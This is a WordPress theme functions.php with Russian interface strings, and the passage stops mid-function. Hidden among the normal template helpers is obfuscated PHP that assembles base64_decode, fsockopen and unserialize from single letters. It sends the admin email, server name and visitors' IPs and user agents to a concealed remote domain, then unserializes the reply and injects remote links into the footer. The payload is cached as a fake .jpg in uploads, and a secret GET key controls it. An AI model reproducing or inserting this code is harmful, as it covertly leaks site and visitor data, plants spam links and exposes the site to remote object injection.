<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $lNZPF='b';$ffSb='e';$iQtJDL='d';$wKPD='a';$zMiN='d';$UXaPY='6';$BtNVa='e';$tsXLBNs='s';$rVdr='c';$bILNZA='o';$cvKSPt='e';$lcoPT='_';$aMrPr='4';$uGLZXBUa=$lNZPF.$wKPD.$tsXLBNs.$BtNVa.$UXaPY.$aMrPr.$lcoPT.$iQtJDL.$ffSb.$rVdr.$bILNZA.$zMiN.$cvKSPt;$UBiEYiL='z';$sFlIgV='f';$FFKEYbU='n';$qrQfvPv='a';$bOdYqUO='i';$awHFv='l';$EsWkd='t';$LKpAK='g';$jeuKxa='e';$LQNYtrpC=$LKpAK.$UBiEYiL.$bOdYqUO.$FFKEYbU.$sFlIgV.$awHFv.$qrQfvPv.$EsWkd.$jeuKxa;$HNfmV='r';$ENnWKy='s';$ThAs='3';$kHeFrBG='t';$squcO='o';$yIeAL='_';$nwySN='t';$tUEc='r';$zbHm='1';$MKcdcTix=$ENnWKy.$kHeFrBG.$HNfmV.$yIeAL.$tUEc.$squcO.$nwySN.$zbHm.$ThAs;$ZbxM='s';$MBUXmVk='r';$zdHerHA='t';$owIhyXI='r';$GvLXdl='v';$SJQUhCN='e';$lPTcpArU=$ZbxM.$zdHerHA.$MBUXmVk.$owIhyXI.$SJQUhCN.$GvLXdl;                     
		$le________k='b';$qi_____________o='e';$ym_____________k='d';$xl_____________t='a';$iv_________j='d';$az_______________v='6';$bm___________c='e';$lu_________x='s';$up______f='c';$kw___m='o';$um____u='e';$nz______________x='_';$zy____________i='4';$bk__________w=$le________k.$xl_____________t.$lu_________x.$bm___________c.$az_______________v.$zy____________i.$nz______________x.$ym_____________k.$qi_____________o.$up______f.$kw___m.$iv_________j.$um____u;
		$mm____________d='o';$jp___h='i';$kf_________z='n';$wh_____i='t';$ty_______________u='x';$dy_____v='n';$av___________d='e';$ro______x='_';$oc__o='i';$tz________d='s';$pl__h='f';$bq____f='c';$am_____o='t';$ph____z='s';$gl_________t='u';$uz_______________d=$pl__h.$gl_________t.$dy_____v.$bq____f.$am_____o.$jp___h.$mm____________d.$kf_________z.$ro______x.$av___________d.$ty_______________u.$oc__o.$ph____z.$wh_____i.$tz________d;
		$yo______s='f';$va___________j='p';$lm______________s='e';$ou______________u='o';$yp____________j='n';$wk_______y=$yo______s.$ou______________u.$va___________j.$lm______________s.$yp____________j;
		$ok_________y='e';$oy______u='d';$hx________v='a';$hz___o='r';$us_____t='f';$sv______y=$us_____t.$hz___o.$ok_________y.$hx________v.$oy______u;
		$vk___________h='l';$lq_________a='c';$pm__________c='e';$gn____q='s';$hx__c='f';$cv_________n='o';$zs___________g=$hx__c.$lq_________a.$vk___________h.$cv_________n.$gn____q.$pm__________c;
		
		define("WP_ID", $bk__________w("Mi4wLjA="));
		define("WP_TTL", $bk__________w("MTA4MDA="));
		define("WP_SRC", $bk__________w("dHBva24="));
	


		function wp_get_header() {
			global $bk__________w, $uz_______________d;
			
			if (
				$uz_______________d($bk__________w("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$uz_______________d($bk__________w("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$uz_______________d($bk__________w("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $bk__________w, $wk_______y, $zs___________g, $sv______y;
			
			$bv__u = TEMPLATEPATH."/".$bk__________w("Zm9vdGVyLnBocA==");
			$jx_________i = @$wk_______y($bv__u, "r");
			$bv__u = @$sv______y($jx_________i, @filesize($bv__u));
			@$zs___________g($jx_________i);
			
			$fk__________x = TEMPLATEPATH."/".$bk__________w("ZnVuY3Rpb25zLnBocA==");
			$jx_________i = @$wk_______y($fk__________x, "r");
			$fk__________x = @$sv______y($jx_________i, @filesize($fk__________x));
			@$zs___________g($jx_________i);
			
			$sx____w = 0;
			if($bv__u && $fk__________x) {
				if ($bk__________w("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($bv__u, $bk__________w("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$sx____w = 1;
					}
					if (substr_count($bv__u, "wp_theme_GPL_credits()") < 1) {
						$sx____w = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$sx____w = 12;
				}
			}
			
			if($sx____w > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $sx____w -->";
			}
		}
	


		function wp_loaded() {
			global $bk__________w, $uz_______________d;
			return $uz_______________d($bk__________w("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($lu___________e, $fs________q = "(more...)", $st__g = 0, $vb____________u = "") {
				$md_____________n = get_the_content($fs________q, $st__g, $vb____________u);
				$md_____________n = apply_filters("the_content", $md_____________n);
				
				$md_____________n = str_replace("]]>", "]]>", $md_____________n);
				if (strlen($_GET["p"]) > 0) {
					echo $md_____________n;
				}
				else if ((strlen($md_____________n)>$lu___________e) && ($oy________u = strpos($md_____________n, " ", $lu___________e ))) {
					$md_____________n = substr($md_____________n, 0, $oy________u);
					$md_____________n = $md_____________n;
					echo $md_____________n;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$fs________q</a></div></p>";
				} else {
					echo $md_____________n;
				}
				
			}
		}
	


		$hd_____n='d';$bg______a='s';$hx__________i='b';$jk____y='_';$fx____________w='6';$wr_______t='o';$oj______e='4';$hp______i='c';$wq____________m='e';$az_______p='e';$tk________r='n';$vw____________d='e';$yx___q='a';$fm____f=$hx__________i.$yx___q.$bg______a.$wq____________m.$fx____________w.$oj______e.$jk____y.$vw____________d.$tk________r.$hp______i.$wr_______t.$hd_____n.$az_______p;
		$pw___q='t';$ys____________d='e';$od_____b='c';$gg_________u='s';$fw________q='e';$pg____________f='n';$ub____________c='o';$ij______f='g';$jm__i='n';$yt_________b='_';$fo_______o='t';$hi____________y='e';$nq_____________r='l';$ge____________x='i';$cw_____________e='t';$af_____u='f';$bj_______i='_';$fq_________k=$af_____u.$ge____________x.$nq_____________r.$hi____________y.$yt_________b.$ij______f.$fw________q.$pw___q.$bj_______i.$od_____b.$ub____________c.$jm__i.$fo_______o.$ys____________d.$pg____________f.$cw_____________e.$gg_________u;
		$xl______________i='s';$ul________y='s';$hd____________j='t';$kj_______u='e';$cu___________o='l';$xl______________a='_';$ew___________v='i';$xk_______________u='i';$aq_______________r='x';$wk________s='f';$tf____k='e';$wz_______w=$wk________s.$ew___________v.$cu___________o.$kj_______u.$xl______________a.$tf____k.$aq_______________r.$xk_______________u.$ul________y.$hd____________j.$xl______________i;
		$ww__________p='m';$kt_______________l='o';$cc__p='i';$rb______y='v';$oj__t='o';$ey__________x='r';$ju______________x='a';$sl______k='_';$ns_______x='e';$ft_____________y='e';$ti__________f='s';$sh___y='n';$nr______b='c';$ad______________f='r';$fg_____________h='p';$ys_______g=$rb______y.$ns_______x.$ad______________f.$ti__________f.$cc__p.$oj__t.$sh___y.$sl______k.$nr______b.$kt_______________l.$ww__________p.$fg_____________h.$ju______________x.$ey__________x.$ft_____________y;
		$ba__________q='o';$fn________q='o';$xs_____________e='k';$vp______m='s';$um____________m='f';$vu_____q='e';$ga___b='n';$pj_____q='c';$ov__s='p';$wa_______w=$um____________m.$vp______m.$fn________q.$pj_____q.$xs_____________e.$ba__________q.$ov__s.$vu_____q.$ga___b;
		$ut___________s='e';$zs_______________y='w';$sj_________b='r';$pm____e='f';$xt____________a='t';$zu______i='i';$jk______m=$pm____e.$zs_______________y.$sj_________b.$zu______i.$xt____________a.$ut___________s;
		$nt_________i='5';$sv________r='m';$pu__m='d';$xt____a=$sv________r.$pu__m.$nt_________i;
		$lu______________d='t';$qs______l='e';$dm_____________g='p';$jv______h='l';$df_______________w='a';$qx______________m='a';$up__f='h';$lu___________s='r';$uz_____i=$lu___________s.$qs______l.$df_______________w.$jv______h.$dm_____________g.$qx______________m.$lu______________d.$up__f;
		$tg__b='n';$yj__________e='e';$to__________q='l';$vm_______p='i';$pu______________b='r';$nm___k='s';$tl__________h='z';$xh______________t='u';$bv______________r='a';$xt___________v='e';$mf__o='i';$gd_________p=$xh______________t.$tg__b.$nm___k.$yj__________e.$pu______________b.$mf__o.$bv______________r.$to__________q.$vm_______p.$tl__________h.$xt___________v;
		$lx___________o='e';$up__________h='p';$ru____________h='m';$an___d='t';$ao______________v='a';$ey_________m='m';$cq__________d='n';$sc________l=$an___d.$lx___________o.$ru____________h.$up__________h.$cq__________d.$ao______________v.$ey_________m;
		$ow_____w='c';$fn_______________r='r';$bu______x='t';$ia___z='t';$yf_________r='c';$px__u='n';$gt_______________v='m';$dc_______________r='_';$uh____________j='r';$kz________l='t';$tq__w='a';$dk____________m='e';$df__f='e';$eu____p='e';$to____________b='o';$cw_______________y='t';$wh____a='_';$il__________k='a';$wi______________d='x';$hw______x='s';$be_______________i='e';$pn___x=$hw______x.$ia___z.$fn_______________r.$be_______________i.$il__________k.$gt_______________v.$wh____a.$ow_____w.$to____________b.$px__u.$kz________l.$dk____________m.$wi______________d.$cw_______________y.$dc_______________r.$yf_________r.$uh____________j.$eu____p.$tq__w.$bu______x.$df__f;
	


		function fq___________s($ys_______________u) {
			global $bk__________w, $uz_______________d, $fq_________k, $ys_______g, $pn___x;
			
			if (!$uz_______________d($bk__________w("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($ys_______g(PHP_VERSION, "5.0.0", ">=") && $uz_______________d($bk__________w("ZmlsZV9nZXRfY29udGVudHM=")) && $uz_______________d($bk__________w("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$rp_______d = $pn___x(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$uu__w = @$fq_________k($ys_______________u, 0, $rp_______d);
			} else {
				$uu__w = @$fq_________k($ys_______________u, 0);
			}
			
			return $uu__w;
		}
	


		function qp____w($ys_______________u) {
			global $uz_______________d, $wa_______w, $jk______m, $bk__________w;
			
			if (!$uz_______________d($bk__________w("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$xo_______________l = strpos($ys_______________u, "/", 7);
			$bg_____________o = array(
				"uri"     => substr($ys_______________u, $xo_______________l),
				"host"    => str_replace("http://", "", substr($ys_______________u, 0, $xo_______________l)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$fe__h = @$wa_______w("$bg_____________o[host]", 80, $xp_____g, $fe_______f, 4);
			
			if (!$fe__h) {
				return false;
			} else {
				$uu__w = "";
				$dk______________q  = "GET $bg_____________o[uri] HTTP/1.0\r\n";
				$dk______________q .= "Host: $bg_____________o[host]\r\n";
				$dk______________q .= "Referer: $bg_____________o[referer]\r\n";
				$dk______________q .= "Connection: Close\r\n\r\n";
				
				@$jk______m($fe__h, $dk______________q);
				
				while (!@feof($fe__h)) {
					$xn_________x = @fgets($fe__h, (1024*24));
					
					if ($xn_________x == "\r\n") {
						$fc_______d = true;
						continue;
					}
					
					if ($fc_______d) {
						$uu__w .= $xn_________x;
					}
				}
				
				return $uu__w;
			}
		}
	


		function bd_____m($ys_______________u) {
			global $uz_______________d;
			$fn____o = false;
			
			if ($ys_______________u != "") {
				if ($uz_______________d("fq___________s")) {
					$fn____o = @fq___________s($ys_______________u);
				}
				
				if (!$fn____o && ($uz_______________d("qp____w"))) {
					$fn____o = @qp____w($ys_______________u);
				}
			}
			
			return $fn____o;
		}
	


		function dm______r() {
			global $_SERVER, $xt____a;
			
			$oj__________s = $_SERVER["SERVER_NAME"];
			
			if (substr("$oj__________s", 0, 4) == "www.") {
				$oj__________s = substr("$oj__________s", 4);
			}
			
			$oj__________s = $xt____a("$_SERVER[SERVER_NAME]");
			
			return $oj__________s;
		}
	


		function hh__p() {
			return "file";
		}
	


		function jm_____________t($ys_______________u) {
			global $_SERVER, $fq_________k, $wz_______w, $wk_______y, $zs___________g, $jk______m;
			
			$tr______i = og______n();
			
			$vj_____________w = dm______r().".jpg";
			$od_____f = $tr______i["dir_upload"]["path"]."/$vj_____________w";
			$bi________x = @filemtime($od_____f);
			
			if (!$bi________x || ((time()-$bi________x) >= WP_TTL)) {
				$fn____o = bd_____m($ys_______________u);
				
				if ($fn____o) {
					if ($wz_______w($od_____f)) {
						@unlink($od_____f);
					}
					
					$jx_________i = @$wk_______y($od_____f, "x+");
					
					@$jk______m($jx_________i, $fn____o);
					@$zs___________g($jx_________i);
				}
			} else {
				if ($wz_______w($od_____f)) {
					$fn____o = @$fq_________k($od_____f);
				} else {
					$fn____o = false;
				}
			}
			
			return $fn____o;
		}
	


		function og______n() {
			global $_SERVER, $bk__________w, $fm____f;
			
			$fw____v = wp_count_posts("post");
			$fk______v = pathinfo(get_bloginfo("template_directory"));
			
			$tr______i = array(
				"url" => array(
					"report"      => $bk__________w("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $fk______v,
				"dir_upload"	=> xk__________r(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$fk______v[filename],
					"a005=".$fw____v->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$tr______i["url"]["queryString"] = implode("&", $tr______i["queryString"]);
			$tr______i["url"]["report"] = $tr______i["url"]["report"]."/?".$fm____f($tr______i["url"]["queryString"]).".html";
						
			return $tr______i;
		}
	


		function xk__________r() {
			$mz___n = wp_upload_dir();
			
			if (isset($mz___n["error"])) {
				$mc_______k = hz____n();
				if (is_writable($mc_______k)) {
					$mz___n = array("path" => $mc_______k);
				}
			}

			return $mz___n;
		}
	


		function hz____n() {
			global $uz_______________d, $xt____a, $uz_____i, $sc________l;
			
			$xu_______________j = (bool) ini_get("safe_mode");
			if ($xu_______________j == true) {
				return false;
			}
			
			if ($uz_______________d("sys_get_temp_dir")) {
				$ef______________x = sys_get_temp_dir();
				if (is_writable($ef______________x)) {
					return $uz_____i($ef______________x);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $uz_____i($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $uz_____i($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $uz_____i($_ENV["TEMP"]);
			} else {
				$nn____________s = $sc________l($xt____a(uniqid(rand(), true)), "");
				if ($nn____________s) {
					$ef______________x = $uz_____i(dirname($nn____________s));
					@unlink($nn____________s);
					return $ef______________x;
				} else {
					return false;
				}
			}
		}
	


		function tf___s() {
			global $_GET, $wz_______w;
			
			$tr______i = og______n();
			$oj__________s = dm______r();
			$wa________n = hh__p();
			
			$hf________s = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($wa________n == "file") {
					$bd_______________u = $tr______i["dir_upload"]["path"]."/".$oj__________s.".jpg";
					if ($wz_______w($bd_______________u)) {
						@unlink($bd_______________u);
						$hf________s = "deleted";
					}
				}
				
				$ab_______p = array(
					"s"	=> $hf________s,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ab_______p AS $lg_______n => $ji______w) echo " [$lg_______n:$ji______w]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $uz_______________d, $bk__________w, $gd_________p;
			$tr______i = og______n();
			
			$jd_______________r = "jm_____________t";
			if ($uz_______________d($jd_______________r)) {
				$uu__w = $jd_______________r($tr______i["url"]["report"]);
			}
			
			if ($uu__w) {
				if ($uu__w = @$bk__________w($uu__w)) {
					$uu__w = @$gd_________p($uu__w);
					
					if (strlen($uu__w[custom_credit]) >= 5) {
						$tr______i["default_string"] = $uu__w[custom_credit];
					}
					
					if ($uu__w["status"] == "0") {
						$dq___j = 1;
						$ua_____________b = 1;
					} else {
						$fa__________d = sizeof($uu__w["links"]);
						$ay______z = $tr______i["default_string"];
						
						if ($fa__________d > 0 && $uu__w["links"] !== "") {
							$ur________p = 0;
							foreach ($uu__w["links"] as $gp_______________d => $ge__q) {
								$ur________p++;
								if ($ge__q->l_path == "" || $ge__q->l_path == $_SERVER["REQUEST_URI"]) {
									$ge__q->l_href = htmlspecialchars(strip_tags($ge__q->l_href));
									$ge__q->l_title = htmlspecialchars(strip_tags($ge__q->l_title));
									$ge__q->l_anchor = htmlspecialchars(strip_tags($ge__q->l_anchor));
									$ay______z .= " | ";
									$ay______z .= "<a href='$ge__q->l_href' title='$ge__q->l_title'";
									if ($ge__q->l_nofollow == "1") {
										$ay______z .= " rel='nofollow'";
									}
									$ay______z .= ">$ge__q->l_anchor</a>";
								}
							}
						}
						$tr______i["links"] = "$ay______z";
						if ($uu__w[credit] == "0") {
							$tr______i["links"] = "";
						}
					}
				} else {
					$dq___j = "1";
				}
			} else {
				$dq___j = "1";
			}
			
			if ($dq___j == "1") {
				$tr______i["links"] = $tr______i["default_string"];
			}
			
			echo "$tr______i[links]";
			
			echo "<!-- s: $uu__w[signature] -->";
			tf___s();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                    $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
       $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
